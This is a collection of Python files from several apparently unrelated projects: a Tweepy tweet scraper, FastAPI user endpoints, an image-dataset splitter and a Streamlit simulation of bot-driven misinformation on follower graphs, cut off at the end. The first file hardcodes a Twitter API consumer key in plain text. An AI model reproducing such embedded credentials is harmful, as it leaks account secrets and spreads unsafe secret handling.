#### File: temp/oldFiles/provaCursorsTweet.py
```python
import tweepy
import re
import string
# Consumer keys and access tokens, used for OAuth
consumer_key = "P5wTozEUuNOAJCXMajGnRcDs2"
consumer_secret = "<KEY>"
access_token = "<KEY>"
access_token_secret = "<KEY>"
# OAuth process, using the keys and tokens
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
# Creation of the actual interface, using authentication
api = tweepy.API(auth)
# reset the output files every time the script runs
text_file = open(".\\tweetTrumpComplete.txt","w")
text_file.close
text_file = open(".\\tweetTrumpClean.txt","w")
text_file.close
text_file = open(".\\tweetFedererComplete.txt","w")
text_file.close
text_file = open(".\\tweetFedererClean.txt","w")
text_file.close
text_file = open(".\\tweetMercedesComplete.txt","w")
text_file.close
text_file = open(".\\tweetMercedesClean.txt","w")
text_file.close
# for tweet in public_tweets:
# with open("tweet.txt", 'a', encoding='utf8') as text_file:
# text_file.write(tweet.text + "\n")
# print(tweet.text)
string_punctuation = ".#,_;"
def remove_punctuation(s):
no_punct = ""
for letter in s:
if letter not in string_punctuation:
no_punct += letter
return no_punct
def get_user_mentions(tweet):
return [m['screen_name'] for m in tweet['entities']['user_mentions']]
# passing a number to items() limits the download to that many tweets
for status in tweepy.Cursor(api.user_timeline, screen_name='@realDonaldTrump').items():
with open("tweetTrumpComplete.txt", 'a', encoding='utf8') as text_file:
text_file.write(status.text + "\n")
strNoUrl = re.sub(r"http\S+", "", status.text)
strNoPunct = remove_punctuation(strNoUrl)
with open("tweetTrumpClean.txt", 'a', encoding='utf8') as text_file:
text_file.write(strNoPunct + "\n")
# print(status._json['text'])
#print(status.text)
for status in tweepy.Cursor(api.user_timeline, screen_name='@rogerfederer').items():
with open("tweetFedererComplete.txt", 'a', encoding='utf8') as text_file:
text_file.write(status.text + "\n")
strNoUrl = re.sub(r"http\S+", "", status.text)
strNoPunct = remove_punctuation(strNoUrl)
with open("tweetFedererClean.txt", 'a', encoding='utf8') as text_file:
text_file.write(strNoPunct + "\n")
for status in tweepy.Cursor(api.user_timeline, screen_name='@MercedesAMG').items(2000):
with open("tweetMercedesComplete.txt", 'a', encoding='utf8') as text_file:
text_file.write(status.text + "\n")
strNoUrl = re.sub(r"http\S+", "", status.text)
strNoPunct = remove_punctuation(strNoUrl)
with open("tweetMercedesClean.txt", 'a', encoding='utf8') as text_file:
text_file.write(strNoPunct + "\n")
```
#### File: temp/oldFiles/utility.py
```python
import csv
import numpy as np
import pandas as pd
import math as mh
import logging
import re
import os
from nltk.util import ngrams
from collections import Counter
# Build a merged dictionary from the input files and return the path to it
def compute_dictionary(input_dicts):
path_to_dictionaries = "../tweet_library/"
path_to_final_dictionary = "../dictionaries/"
# mkdir to dictionary if not exists
if(not(os.path.exists(path_to_final_dictionary))):
os.makedirs(path_to_final_dictionary)
# build path to merged dictionary
for dict in input_dicts:
path_to_final_dictionary += dict
path_to_final_dictionary += ".txt"
# remove if already existing
try:
os.remove(path_to_final_dictionary)
except OSError:
pass
# concatenate input_dicts in the final dictionary
with open(path_to_final_dictionary, "a", encoding="utf8") as output_dict:
for dict in input_dicts:
dict_path = path_to_dictionaries + dict + ".txt"
with open(dict_path, "rt", encoding="utf-8") as input_dict:
if(not(os.path.exists(dict_path))):
print("Dizionario non presente!")
output_dict.write(input_dict.read())
return path_to_final_dictionary
##########-----TEMP-----#########
#My Method to generate frequency matrix using a given alphabet and a file
def createFrequencyMatrix(file):
alphabet = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']
finalList = []
with open(file, "rt", encoding="utf8") as myFile:
for char in alphabet:
text = myFile.read()
text = text.lower()
curstring = text
letters = []
while len(curstring) > 0:
arr = curstring.split(char, 1)
if len(arr) == 1:
break
letters.append(arr[1][0])
curstring = arr[1]
#Remove the space
while ' ' in letters:
letters.remove(' ')
freq = {}
for l in letters:
if l in freq.keys():
continue
freq[l] = letters.count(l) / len(letters)
finalList.append(freq)
#Create the final dataframe with the letters
myDict = pd.DataFrame(finalList)
print(myDict)
return myDict
```
|
{
"source": "JeyDi/Python-Skeleton",
"score": 2
}
|
#### File: app/src/config.py
```python
import os
from functools import lru_cache
from dotenv import dotenv_values
from pathlib import Path
from pydantic import BaseSettings, root_validator
from typing import Any, Dict
from app.src.common.utils import read_yaml
from app.src.logger import logger
class Settings(BaseSettings):
"""
Settings class for application settings and secrets management
Official documentation on pydantic settings management:
- https://pydantic-docs.helpmanual.io/usage/settings/
"""
# Set the application variables
APP_NAME: str = os.environ.get("APP_NAME", "Test")
    # if you want to test gunicorn the below environment variable must be False
DEBUG_MODE: str = os.environ.get("DEBUG_MODE", "True")
VERBOSITY: str = os.environ.get("VERBOSITY", "DEBUG")
# Application Path
APP_PATH: str = os.environ.get("PROJECT_WORKSPACE", os.path.abspath("."))
CONFIG_PATH: str = os.path.join(APP_PATH, "app", "config")
DATA_PATH: str = os.path.join(APP_PATH, "app", "data")
# Database settings
DB_CONFIG: dict = {
"db_name": os.getenv("DB_NAME", "test"),
"db_user": os.getenv("DB_USER", "root"),
"db_password": os.getenv("DB_PASSWORD", "<PASSWORD>"),
"db_port": os.getenv("DB_PORT", "5492"),
"db_host": os.getenv("DB_HOST", "localhost"),
}
# Read the configurations
APP_CONFIG: dict = read_yaml(CONFIG_PATH, filename="settings.yml")
# logging
logger.debug(f"App path: {APP_PATH}")
logger.debug(f"Config path: {CONFIG_PATH}")
logger.debug(f"Data Path: {DATA_PATH}")
# EXTRA VALUES not mapped in the config but that can be existing in .env or env variables in the system
extra: Dict[str, Any] = None
@root_validator(pre=True)
def build_extra(cls, values: Dict[str, Any]) -> Dict[str, Any]:
all_required_field_names = {
field.alias for field in cls.__fields__.values() if field.alias != "extra"
} # to support alias
extra: Dict[str, Any] = {}
for field_name in list(values):
if field_name not in all_required_field_names:
extra[field_name] = values.pop(field_name)
values["extra"] = extra
return values
def env_load(env_file: str) -> Settings:
"""
If you want to generate settings with a specific .env file.
    Be careful: you should insert only env variables that exist in the config.
Look into official technical documentation for more information about the variables.
Args:
env_file (str): The path to the .env file. (with the name)
Returns:
Settings: The settings object with the .env file loaded.
"""
try:
# get the dotenv file values into an OrderedDict
env_settings = dotenv_values(env_file)
# convert to normal dict
env_settings = dict(env_settings)
# define and create the new object
settings = Settings(**env_settings)
return settings
except Exception as message:
print(f"Error: impossible to read the env: {message}")
return None
# cache system to read the settings without everytime read the .env file
@lru_cache()
def get_settings(settings: Settings = None, env_file: str = None, **kwargs) -> Settings:
"""
Function to get the settings object inside the config.
    This function uses lru_cache to cache the settings object and avoid reading the .env file from disk every time (much faster).
Args:
settings (Settings, optional): The settings object to use. Defaults to None.
Returns:
Settings: The settings object.
"""
# define the new settings
try:
if not settings:
if env_file:
                # check if the env file exists
if not Path(env_file).exists(): # nocov
settings = None
raise ValueError(f"Config file {env_file} does not exist.")
else:
settings = env_load(env_file)
else:
settings = Settings(**kwargs)
return settings
except Exception as message:
print(f"Error: impossible to get the settings: {message}")
return None
# # define the settings (use the env file if it's used)
env_file = os.environ.get("ENV_FILE", None)
settings = get_settings(env_file=env_file)
```
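The build_extra root validator above funnels any value that is not a declared field into the extra dict. A standalone sketch of that pattern with the pydantic v1 API, using a deliberately tiny settings class so it does not depend on the project's YAML config or .env files:
```python
from typing import Any, Dict

from pydantic import BaseSettings, root_validator


class MiniSettings(BaseSettings):
    APP_NAME: str = "Test"
    extra: Dict[str, Any] = None

    @root_validator(pre=True)
    def build_extra(cls, values: Dict[str, Any]) -> Dict[str, Any]:
        # collect every key that does not correspond to a declared field
        declared = {f.alias for f in cls.__fields__.values() if f.alias != "extra"}
        values["extra"] = {k: values.pop(k) for k in list(values) if k not in declared}
        return values


settings = MiniSettings(APP_NAME="demo", SOME_UNKNOWN_FLAG="1")
print(settings.APP_NAME)  # demo
print(settings.extra)     # {'SOME_UNKNOWN_FLAG': '1'}
```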
#### File: src/core/manager.py
```python
from typing import List
from app.src.logger import logger
from app.src.config import settings
def logic_test(message: str = None) -> str:
"""Logic test function.
This is a simple example how to write functions in Python
Args:
message (str, optional): A message you want to use. Defaults to None.
Raises:
Exception: If it's impossible to compose the message
Returns:
str: The elaborated message by the function
"""
logger.debug("Test logic function")
try:
message = message.upper()
except Exception as e:
logger.error(f"Impossible to compose the message: {message}, because: {e}")
logger.exception(f"Error: {e}")
raise Exception(e)
logger.debug(f"Message modified: {message} on the app: {settings.APP_NAME}")
return message
def convert_numbers(numbers: List[int]) -> int:
"""Convert and sum all elements in a list
Args:
numbers (List[int]): List of integers to sum
Returns:
int: the result of the sum
"""
result = sum(numbers)
return result
def name_parsing(name: str = None) -> str:
"""Ester egg spaghetti
Args:
name (str, optional): the name you want to pass. Defaults to None.
Returns:
str: the result string
"""
if name is None:
logger.error(f"Name: {name} not valid, please retry..")
logger.exception("Name not valid..")
logger.info(f"Hello: {name.strip().lower()}, welcome here!")
logger.debug("So do you like spaghetti right?")
return name
```
#### File: src/{{cookiecutter.package_name}}/pipeline.py
```python
def run_pipeline(local_data_path: str):
"""
Run the main processing pipeline.
Returns:
A dataframe containing the output of the pipeline
"""
# io = IO(path)
# df = io.load_cleaned_file(download_always=False)
# df = add_choke_events(df)
# Add calls to features.Xxx here
# save (or return) dataframe here?
```
#### File: api/endpoints/user.py
```python
import datetime as dt
from typing import Any, List
from fastapi import APIRouter, Depends, HTTPException
# from fastapi.encoders import jsonable_encoder
from sqlalchemy.orm import Session
from app.src.db.manager import get_session
from app.src import models
from app.src.api import crud
from app.src.common import security, utils
router = APIRouter()
# define and inherit the base model for the CRUD operations over products
crud_base = crud.base(models.User)
# create user
# get all users
# get single user
# update user
# delete user
# make user admin
@router.get("/", response_model=List[models.UserDataModel])
async def read_users(
*,
db: Session = Depends(get_session),
skip: int = 0,
limit: int = 100,
current_user: models.UserBase = Depends(security.get_current_admin_user),
) -> Any:
"""
Retrieve all users
"""
start_time = dt.datetime.now()
try:
users = crud.user.get_multi(db, skip=skip, limit=limit)
utils.profiling_api("user:get:all", start_time, "info")
if not users:
raise HTTPException(status_code=404, detail="No users found")
except Exception as e:
utils.profiling_api("user:get:all", start_time, "error")
raise HTTPException(
status_code=404, detail=f"Impossible to get the list of all users: {e}"
)
return users
@router.get("/{user_id}", response_model=models.UserDataModel)
async def read_single_user(
*,
db: Session = Depends(get_session),
user_id: int,
current_user: models.UserBase = Depends(security.get_current_user),
) -> Any:
start_date = dt.datetime.now()
user = crud_base.get(db, id=user_id)
if not user:
utils.profiling_api("user:get:single:id", start_date, "error")
raise HTTPException(status_code=404, detail="User not found")
utils.profiling_api("user:get:single:id", start_date, "info")
return user
@router.get("/info/{email}", response_model=models.UserDataModel)
async def read_single_user_by_mail(
*,
db: Session = Depends(get_session),
email: str,
current_user: models.UserBase = Depends(security.get_current_user),
) -> Any:
start_date = dt.datetime.now()
user = crud.user.get_by_email(db, email=email)
if not user:
utils.profiling_api("user:get:single:email", start_date, "error")
raise HTTPException(status_code=404, detail="User not found")
utils.profiling_api("user:get:single:email", start_date, "info")
return user
@router.get("/info/{username}", response_model=models.UserDataModel)
async def read_single_user_by_username(
*,
db: Session = Depends(get_session),
username: str,
current_user: models.UserBase = Depends(security.get_current_user),
) -> Any:
start_date = dt.datetime.now()
user = crud.user.get_by_username(db, username=username)
if not user:
utils.profiling_api("user:get:single:username", start_date, "error")
raise HTTPException(status_code=404, detail="User not found")
utils.profiling_api("user:get:single:username", start_date, "info")
return user
@router.post("/", response_model=models.UserDataModel)
async def create_user(
*,
db: Session = Depends(get_session),
user_in: models.UserCreate,
current_user: models.UserBase = Depends(security.get_current_admin_user),
) -> Any:
start_date = dt.datetime.now()
try:
user = crud.user.create(db, obj_in=user_in)
utils.profiling_api("user:create", start_date, "info")
return user
except Exception as message:
utils.profiling_api("user:create", start_date, "error")
        raise HTTPException(
            # 400 (bad request) is more accurate here and matches the update endpoint below
            status_code=400, detail=f"Impossible to add a new user: {message}"
        )
@router.put("/update/me", response_model=models.UserDataModel)
async def update_user_me(
*,
db: Session = Depends(get_session),
user_in: models.UserUpdate,
current_user: models.UserBase = Depends(security.get_current_user),
) -> Any:
start_date = dt.datetime.now()
# current_user_data = jsonable_encoder(current_user)
# user_existing = models.UserUpdate(**current_user_data)
# user_data = user_in.dict(exclude_unset=True)
# for key, value in user_data.items():
# setattr(current_user_data, key, value)
try:
user = crud_base.update(db, db_obj=current_user, obj_in=user_in)
utils.profiling_api("user:update", start_date, "info")
if not user:
utils.profiling_api("user:update", start_date, "error")
raise HTTPException(
status_code=404,
detail="Impossible to update the user",
)
except Exception as message:
utils.profiling_api("user:update", start_date, "error")
raise HTTPException(
status_code=400,
detail=f"Impossible to update the user: {message}",
)
```
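A hedged sketch of exercising the router above locally with FastAPI's `TestClient`; the `/users` prefix and the stub dependencies are assumptions, not part of the project:
```python
# Sketch only: mount the router on a throwaway app and override its dependencies.
from fastapi import FastAPI
from fastapi.testclient import TestClient


def make_test_app(session_stub, admin_stub):
    app = FastAPI()
    app.include_router(router, prefix="/users")  # `router` from the module above
    # Swap the real DB session and admin-auth dependencies for the provided stubs.
    app.dependency_overrides[get_session] = lambda: session_stub
    app.dependency_overrides[security.get_current_admin_user] = lambda: admin_stub
    return app


# client = TestClient(make_test_app(session_stub=None, admin_stub=object()))
# print(client.get("/users/", params={"skip": 0, "limit": 10}).status_code)
```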
#### File: JeyDi/Python-Skeleton/__version__.py
```python
__version__ = "0.0.1"
from typing import Union
def format_unit(value: Union[float, int], unit: str) -> str:
"""[summary]
Args:
value (Union[float, int]): [description]
unit (str): [description]
Returns:
str: [description]
"""
return "{} {}".format(value, unit)
```
|
{
"source": "JeyDi/SeasonImageAnalyzer",
"score": 3
}
|
#### File: SeasonImageAnalyzer/downloader/dataset_organizer.py
```python
import os
import random
import shutil
import numpy as np
import cv2
from pathlib import Path
from tqdm import tqdm
from random import shuffle
from keras.preprocessing import image
from image_processing import processImage
main_keywords = ['summer','winter','autumn','spring']
main_dir_path = Path(__file__).resolve().parent.parent
split = 0.7
## Function 1:
# go into the corresponding folder
# prepend the label to the file name: summer_id.jpg
# take the first half of the images (the split percentage is configurable)
# move the first part into trainingset and recompute the indexes after the label: summer_newid.jpg
# move the second part into testset and recompute the indexes after the label: summer_newid.jpg
def clean_images(main_keywords,main_dir_path,split=0.7):
training_path = os.path.join(main_dir_path, "trainingset")
test_path = os.path.join(main_dir_path, "testset")
print("\ntraining_path: " + str(training_path))
print("\ntest_path: " + str(test_path))
for i, item in enumerate(main_keywords):
dir_path = os.path.join(main_dir_path,"download",item)
filenames = os.listdir(dir_path)
print("\ndir_path: " + str(dir_path))
print("Number of files in the folder: ",len(filenames))
        if filenames:
for i, picture in enumerate(filenames):
#Check if the files already updated
if "_" not in picture:
filename_without_ext = os.path.splitext(picture)[0]
extension = os.path.splitext(picture)[1]
new_file_name = str(item) + "_" + filename_without_ext
new_file_name_with_ext = new_file_name + extension
#print(new_file_name_with_ext)
os.rename(os.path.join(dir_path,picture), os.path.join(dir_path,new_file_name_with_ext))
else:
continue
#Re-get the new list of filenames
filenames = os.listdir(dir_path)
#Split the file to create the trainingset and the test set
            number_to_split = round(len(filenames) * split)
print("Number to split in ", item, " : ", number_to_split)
#trainingset = range(0, len(main_keywords)-1, number_to_split)
            # For each of the number_to_split elements:
            # generate a random index between 0 and the number of remaining files
            # take the file at that index and move it into the training folder
#List of all files in the directory
            for i in range(number_to_split):  # one iteration per file moved into the training set
filenames = os.listdir(dir_path)
element = random.randint(0, len(filenames)-1)
element_to_move = filenames[element]
training_item_folder = os.path.join(training_path,item)
training_file = os.path.join(training_path,item,element_to_move)
#If the subfolder doesn't exist, create
if not os.path.exists(training_item_folder):
os.makedirs(training_item_folder)
if os.path.isfile(training_file):
print("File: " + str(training_file) + " already exist in the training set..")
continue
else:
#Preprocess image and move
element_to_move_processed = processImage(os.path.join(dir_path,element_to_move))
if element_to_move_processed is not None:
shutil.move(element_to_move_processed, training_file)
#Reload list of files remaining in the dataset subfolder
remaining_filenames = os.listdir(dir_path)
print("remaining files for testset: ", len(remaining_filenames))
#Move this remaining file to the test set
for f in remaining_filenames:
test_item_folder = os.path.join(test_path,item)
test_file = os.path.join(test_path,item,f)
#If the subfolder doesn't exist, create
if not os.path.exists(test_item_folder):
os.makedirs(test_item_folder)
if os.path.isfile(test_file):
print("File: " + str(test_file) + " already exist in the test set..")
continue
else:
#Preprocess image and move
element_to_move_processed = processImage(os.path.join(dir_path,f))
if element_to_move_processed is not None:
shutil.move(element_to_move_processed, test_file)
print("Folder: ", item, " splitted")
else:
print("Folder is empty..")
    return True
#<NAME>
## Function 2:
### Recompute the indexes for the training set and the test set
def calculate_indexes(start_path,datasetname = "trainingset"):
dir_path = os.path.join(start_path,datasetname)
print("Calculate new indexes in: ", dir_path)
filenames = os.listdir(dir_path)
for i, item in enumerate(filenames):
class_name = item.split('_')[0]
extension = item.split('.')[1]
new_name = class_name + "_" + str(i) + "." + extension
old_image = os.path.join(dir_path,item)
new_image = os.path.join(dir_path,new_name)
os.rename(old_image, new_image)
print("Completed...")
return True
## Function 3:
# build a numpy array loading the images in RGB
# save the numpy array for the experiments
#Create a label for an image
def create_label(keywords,image):
for i, key in enumerate(keywords):
label = image.split('_')[0]
if key.lower() == label.lower():
ohl = np.array([i])
return(ohl)
#Create the dataset
def create_dataset(keywords,start_path,dataset_type="trainingset"):
dataset = []
dir_path = os.path.join(start_path, dataset_type)
for i in tqdm(os.listdir(dir_path)):
image_path = os.path.join(dir_path,i)
#print("ImagePath: ",image_path)
# Load image in color
img = image.load_img(image_path)
#Append the new image and label
dataset.append([np.array(img),create_label(keywords,i)])
dataset = np.array(dataset)
#Save the numpy array to disk
outfile = str(os.path.join(start_path,dataset_type)) + ".npy"
np.save(outfile, dataset)
print("Numpy array saved")
return dataset
```
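A hedged sketch of how the three steps above appear to be meant to be chained; note that `calculate_indexes` and `create_dataset` walk a flat folder of images, while `clean_images` writes into per-class subfolders, so the paths may need adjusting in practice:
```python
# Sketch of the intended flow (folder layout: download/<keyword>/, trainingset/, testset/).
if __name__ == "__main__":
    if clean_images(main_keywords, main_dir_path, split=split):
        # These two helpers expect a flat folder of images; point them at the
        # per-class subfolders produced by clean_images if needed.
        calculate_indexes(main_dir_path, datasetname="trainingset")
        calculate_indexes(main_dir_path, datasetname="testset")
        train_data = create_dataset(main_keywords, main_dir_path, dataset_type="trainingset")
        test_data = create_dataset(main_keywords, main_dir_path, dataset_type="testset")
        print("Training samples:", len(train_data), "- test samples:", len(test_data))
```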
|
{
"source": "JeyDi/STN",
"score": 4
}
|
#### File: streamlit_app/graph_builder/graph.py
```python
import networkx as nx
import pandas as pd
import os
from tqdm import tqdm
import time
GRAPH_PATH = "./data/graph"
def create_graph(df, follower_number, level2_path, graph_name, direct_graph=True):
"""Create Networkx Graph
It's possible to create direct or not direct graphs.
For now it's working only with 2 level of followers according to the project.
Args:
df (object): dataframe with all the followers (level 1) data
follower_number (int): limit level 1 followers
level2_path (string): path of the second level (level 2) data for the graph
graph_name (string): name of the output file (graph)
direct_graph (bool, optional): If you want to generate a direct graph. Defaults to True.
"""
# TODO: better error catching
G = None
    if direct_graph:
        G = nx.DiGraph()
    else:
        G = nx.Graph()
start_time = time.time()
G.add_node("MainNode")
print(f"Level 2 path: {level2_path}")
print(f"Graph name: {graph_name}")
# add the second level of nodes
index = 0
while len(G.edges("MainNode")) < follower_number:
        try:
            u = df["username"][index]
        except KeyError:
            print("Key Error in csv: no more level-1 followers available")
            break
try:
if not G.has_node(u):
G.add_node(u)
G.add_edge("MainNode", u)
level2 = pd.read_csv(os.path.join(level2_path, u + "_followers.csv"))
for v in level2["username"]:
if not G.has_node(v):
G.add_node(v)
G.add_edge(u, v)
index += 1
        except Exception:
            print(u + " Not downloaded")
            index += 1
print(f'Main Node has {len(G.edges("MainNode"))} edges')
G_int = nx.convert_node_labels_to_integers(G)
graph_filename = os.path.join(GRAPH_PATH, graph_name + ".gexf")
nx.write_gexf(G_int, graph_filename)
print("--- %s seconds ---" % (time.time() - start_time))
print(f"Graph generated to: {graph_filename}")
node_numbers = G.number_of_nodes()
return node_numbers
```
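A hedged usage sketch of `create_graph`; the CSV paths and file naming are assumptions based on the paths used inside the function (`<username>_followers.csv`, `./data/graph/`), and the output folder must exist:
```python
# Sketch only: build a directed graph from a level-1 followers CSV.
import pandas as pd

followers_df = pd.read_csv("./data/followers/main_followers.csv")  # needs a "username" column
node_count = create_graph(
    df=followers_df,
    follower_number=100,                    # cap on level-1 edges from the main node
    level2_path="./data/followers/level2",  # folder with <username>_followers.csv files
    graph_name="followers_graph",
    direct_graph=True,
)
print(f"Graph written with {node_count} nodes")
```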
#### File: STN/streamlit_app/menu.py
```python
import streamlit as st
from menus.side_menu import (
menu_scraper,
menu_graph_generator,
menu_bot_selection,
menu_soil_simulation_subroutine,
menu_plot_generations,
count_statistics,
)
def side_menu():
"""
Streamlit side config menu
"""
st.sidebar.markdown("**Configuration Panel**")
#### SCRAPER CONFIGURATION ####
menu_scraper()
#### GRAPH GENERATION ####
menu_graph_generator()
#### BOT SELECTION ####
menu_bot_selection()
#### SIMULATION WITH SOIL ####
    # TODO: test directed and undirected cases
menu_soil_simulation_subroutine()
#### PLOT GENERATIONS ####
menu_plot_generations()
#### COUNT STATISTICS ####
count_statistics()
def launch():
"""
Main function to launch all the streamilit functionalities
"""
try:
# Launch the side menu for all the configurations
result = side_menu()
return True
except Exception as message:
print(f"Impossible to launch the streamlit functionalities: {message}")
return False
```
#### File: streamlit_app/statistics/visualizations.py
```python
import statistics.counters as cn
import networkx as nx
import pandas as pd
import plotly.express as px
from plotly.offline import plot
import streamlit as st
def print_stats(G, step, graph_name):
not_exposed = cn.count_not_exposed(G)
exposed = cn.count_exposed(G)
exposed_opinion_leader = cn.count_exposed_opinion_leader(G)
exposed_bot = cn.count_exposed_bot(G)
exposed_user = cn.count_exposed_user(G)
    exposed_directed, exposed_undirected = cn.count_exposed_directed(G)
infected = cn.count_infected(G)
infected_opinion_leader = cn.count_infected_opinion_leader(G)
infected_bot = cn.count_infected_bot(G)
infected_user = cn.count_infected_user(G)
infected_directed, infected_undirected = cn.count_infected_directed(G)
    # Print information for debugging purposes on the terminal
print("---------------------------------------")
print(f"\nSTEP {step}:")
print(f"Not exposed: {not_exposed}")
print(f"Exposed: {exposed}")
print(
f"\tFrom Opinion Leader: {exposed_opinion_leader}, from BOT: {exposed_bot}, from users: {exposed_user}"
)
print(
f"\tDirected: {exposed_directed}, Undirected: {exposed_undirected}"
)
print(f"Infected: {infected}")
print(
f"\tFrom Opinion Leader: {infected_opinion_leader}, from BOT: {infected_bot}, from users: {infected_user}"
)
print(
f"\tDirected: {infected_directed}, Undirected: {infected_undirected}"
)
# Print on GUI
st.markdown("---------------")
st.markdown(f"**STEP: {step} results of: {graph_name}**")
st.markdown(f"Not exposed: {not_exposed}")
st.markdown(f"Exposed: {exposed}")
st.markdown(
f"\tFrom Opinion Leader: {exposed_opinion_leader}, from BOT: {exposed_bot}, from users: {exposed_user}"
)
st.markdown(
f"\tDirected: {exposed_directed}, Undirected: {exposed_undirected}"
)
st.markdown(f"Infected: {infected}")
st.markdown(
f"\tFrom Opinion Leader: {infected_opinion_leader}, from BOT: {infected_bot}, from users: {infected_user}"
)
st.markdown(
f"\tDirected: {infected_directed}, Undirected: {infected_undirected}"
)
def generate_statistics_plots(graph_name, graph_steps):
"""
Generate the final plots and call the statistics print function
Args:
        graph_name (str): name of the result graph saved in the previous logical step
        graph_steps (int): number of steps to process (must match the steps stored in the graph files)
"""
df_final_situation = pd.DataFrame(columns=["type", "value"])
df_step = pd.DataFrame(columns=["type", "step", "value"])
df_exposed = pd.DataFrame(columns=["step", "type", "value"])
st.markdown("")
for i in range(graph_steps):
# read graph and print stats
graph_result_path = "./data/output/"
G = nx.read_gexf(f"{graph_result_path}G_{graph_name}_step{i}.gexf")
print_stats(G, i, graph_name)
        # LINE CHART (append information into the dataframe)
        # NOTE: DataFrame.append was removed in pandas 2.0; with newer pandas, build the rows
        # with pd.concat([df, pd.DataFrame([row])]) instead of the append calls below.
        df_step = df_step.append(
{"type": "not_exposed", "step": i, "value": cn.count_not_exposed(G)},
ignore_index=True,
)
df_step = df_step.append(
{"type": "exposed", "step": i, "value": cn.count_exposed(G)},
ignore_index=True,
)
df_step = df_step.append(
{"type": "infected", "step": i, "value": cn.count_infected(G)},
ignore_index=True,
)
line_chart = px.line(
df_step,
x="step",
y="value",
color="type",
title=f"Infection overall: {graph_name} step: {i}",
)
        # BAR CHART (append information into the dataframe)
df_exposed = df_exposed.append(
{
"step": i,
"type": "opinion_leader",
"value": cn.count_exposed_opinion_leader(G),
},
ignore_index=True,
)
df_exposed = df_exposed.append(
{"step": i, "type": "bot", "value": cn.count_exposed_bot(G)},
ignore_index=True,
)
df_exposed = df_exposed.append(
{"step": i, "type": "user", "value": cn.count_exposed_user(G)},
ignore_index=True,
)
bar_chart = px.bar(
df_exposed,
x="step",
y="value",
color="type",
title=f"Type of agents exposed: {graph_name} step: {i}",
)
        # PIE CHART (append information into the dataframe)
        if i == graph_steps - 1:  # snapshot of the final step for the pie chart
df_final_situation = df_final_situation.append(
{"type": "not_exposed", "value": cn.count_not_exposed(G)},
ignore_index=True,
)
df_final_situation = df_final_situation.append(
{"type": "exposed", "value": cn.count_exposed(G)},
ignore_index=True,
)
df_final_situation = df_final_situation.append(
{"type": "infected", "value": cn.count_infected(G)},
ignore_index=True,
)
#### CREATE THE PLOTS
##Uncomment plot(..) to save the plots to disk in html format
plot_folder = "./data/plots/"
# Plotly Line Plot
# plot(line_chart, filename=f"{plot_folder}steps_{graph_name}.html")
st.plotly_chart(line_chart, use_container_width=True)
# Plotly bar plot
# plot(bar_chart, filename=f"{plot_folder}exposed_type_{graph_name}.html")
st.plotly_chart(bar_chart, use_container_width=True)
# Plotly final pie chart
final_pie_chart = px.pie(
df_final_situation, values="value", names="type", title=f"Final situation plot of: {graph_name}"
)
# plot(final_pie_chart, filename=f"{plot_folder}final_situation.html")
st.plotly_chart(final_pie_chart, use_container_width=True)
print("\nStatistics calculated succesfully")
return True
```
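A short, hedged usage sketch; `generate_statistics_plots` reads the per-step graphs written by the plotting step (`./data/output/G_<name>_step<i>.gexf`) and is meant to run inside the Streamlit app, so the names below are assumptions:
```python
# Sketch only: render statistics for a saved simulation with 5 stored steps.
generate_statistics_plots(graph_name="simulation_500", graph_steps=5)
```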
#### File: streamlit_app/visualize/build_plot.py
```python
import networkx as nx
import pandas as pd
import plotly.graph_objects as go
from plotly.offline import plot
import pickle
from visualize.layout import build_graph
import streamlit as st
def step_graph(G, df, step):
"""
Prende il grafo e per ogni step della simulazione prende i risultati della simulazione di quello step e aggiunge gli attributi ai nodi
"""
try:
print(f"Start editing the plot for the step: {step}")
df_id = df[df["key"] == "id"].reset_index()
df_infected_type = df[df["key"] == "infected_type"].reset_index()
        df_directed = df[df["key"] == "directed"].reset_index()
df_type = df[df["key"] == "type"] # DF with opinion leader and bot
df_type["agent_id"] = df_type["agent_id"].astype("str")
df_type = df_type.set_index("agent_id")
nx.set_node_attributes(G, df_type["value"].to_dict(), "type")
i = 0
while i <= step:
step_df = df_id[df_id["t_step"] == i]
step_df["agent_id"] = step_df["agent_id"].astype("str")
step_df = step_df.set_index("agent_id")
nx.set_node_attributes(G, step_df["value"].to_dict(), "state")
step_infected_type = df_infected_type[df_infected_type["t_step"] == i]
step_infected_type["agent_id"] = step_infected_type["agent_id"].astype(
"str"
)
step_infected_type = step_infected_type.set_index("agent_id")
nx.set_node_attributes(
G, step_infected_type["value"].to_dict(), "infected_type"
)
step_directed = df_directed[df_directed['t_step'] == i]
step_directed['agent_id'] = step_directed['agent_id'].astype(
"str"
)
step_directed = step_directed.set_index('agent_id')
nx.set_node_attributes(
G, step_directed['value'].to_dict(), 'directed'
)
i = i + 1 # INTERVAL IN AGENT PARAMETER
result = G.copy()
print(f"Graph fixed for the step: {step}")
return result
except Exception as message:
print(f"Impossible to edit the graph: {message}")
return None
def generate_graph_plot(
G_path,
simulation_data_path,
simulation_name,
G_step_iterations=5,
sprint_layout_calc=False,
):
# Import data
try:
G = nx.read_gexf(G_path)
df = pd.read_csv(simulation_data_path)
print("data succesfully loaded")
except Exception as message:
print(f"Impossibile to read data: {message}")
    load = False
    try:
if is_simulation_based_on_500(simulation_name):
layout_pickle_filename = "./data/serialization/G_node_poss_layout.pkl"
# Shared layout
if sprint_layout_calc:
G_node_pos = nx.spring_layout(G)
with open(layout_pickle_filename, "wb") as output:
pickle.dump(G_node_pos, output, pickle.HIGHEST_PROTOCOL)
load = False
print("Spring graph layout calcolated and stored")
else:
##load pickle object
with open(layout_pickle_filename, "rb") as input:
G_node_pos = pickle.load(input)
load = True
print("Spring graph layout loaded from pickle file")
except Exception as message:
if load:
print(f"Impossibile to load the pickle file: {message}")
elif not load:
print(f"Impossible to calc and save the pickle file: {message}")
for i in range(G_step_iterations):
print(f"Start generating the plot: {G_step_iterations}")
G_step = None
G_step = step_graph(G, df, i)
nx.write_gexf(G_step, f"./data/output/G_{simulation_name}_step{i}.gexf")
if is_simulation_based_on_500(simulation_name):
result_graph = build_graph(G_step, G_node_pos, i)
st.plotly_chart(result_graph, use_container_width=True)
print(f"{simulation_name} - STEP {i} DONE")
print("\nGraph plot and statistics calculated succesfully")
return True
def is_simulation_based_on_500(simulation_name):
return simulation_name.split("_")[1] == "500"
```
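A hedged sketch of calling `generate_graph_plot`; it is meant to run inside the Streamlit app, the file names follow the `./data` layout used above but are assumptions here, and the `sprint_layout_calc` flag computes and pickles the spring layout on the first run:
```python
# Sketch only: generate per-step plots for a finished SOIL simulation.
generate_graph_plot(
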